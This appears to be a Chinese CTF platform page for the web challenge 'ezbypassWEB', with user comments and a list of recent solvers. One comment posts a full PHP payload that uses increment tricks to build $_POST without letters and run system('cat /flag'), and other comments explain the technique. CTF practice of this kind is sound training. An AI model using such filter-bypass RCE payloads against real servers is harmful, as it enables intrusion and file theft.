ezbypassWEB 未解决

分数: 25 金币: 4
题目作者: XHH1H
一  血: volcano
一血奖励: 5金币
解  决: 510
提  示:
描  述:
flag{}
评论
鲲中霸王 10天前

code=$_=(_/_._)[_];$__=%2B%2B$_;%2B%2B$_;$__=_.$_.$__;%2B%2B$_;%2B%2B$_;$__.=%2B%2B$_;$__.=%2B%2B$_;$$__[_]($$__[__]);&_= system&__=cat /flag

回复 1

lzhh530393027 27天前

看懂解析了,但是再做一次也不会

回复 0

jiubanyipeng 7月前

脚本参考:https://www.jiubanyipeng.com/1851.html

回复 1

Jiafeng 1年前

我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)

回复 0

小丁小丁少发神经 1年前

求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)

回复 0
shingu 8月前

我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。

回复 0

不会写代码的菜鸟 1年前

这道题完全不是我能做的,有答案也看不懂

回复 1

modeng 1年前

以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501

回复 5
Jiafeng 1年前

牛逼,可以直接造出N字符,那就好搞了;

回复 0

hutiaan 1年前

难,为了难而难

回复 0

不懂就问 1年前

参考:https://blog.csdn.net/qq_36292543/article/details/136623586

回复 2

不会编程的崽 1年前

自增绕过,最后的payload可以在burp里进行对特殊字符的url编码

回复 0

WriteUp

image
Jesen

2 金币

评分(4)

解题动态

yinyx 攻破了该题 1天前
zz0607 攻破了该题 2天前
xshzgjshpy 攻破了该题 4天前
南京交通第一深情徐立超 攻破了该题 5天前
南交混的入朱靖宇 攻破了该题 6天前
qinshen 攻破了该题 7天前
白菜白又白 攻破了该题 10天前
鲲中霸王 攻破了该题 10天前
out不慢 攻破了该题 12天前
igotyou 攻破了该题 14天前
180度以南 攻破了该题 15天前
ixin 攻破了该题 16天前
cccczz 攻破了该题 16天前
爱睡觉的鱼 攻破了该题 18天前
xxaqgcszzh 攻破了该题 21天前
caocao 攻破了该题 22天前
一世温华 攻破了该题 22天前
kkkoooppp 攻破了该题 24天前
对对对对对对对对 攻破了该题 25天前
tytu 攻破了该题 25天前
问题反馈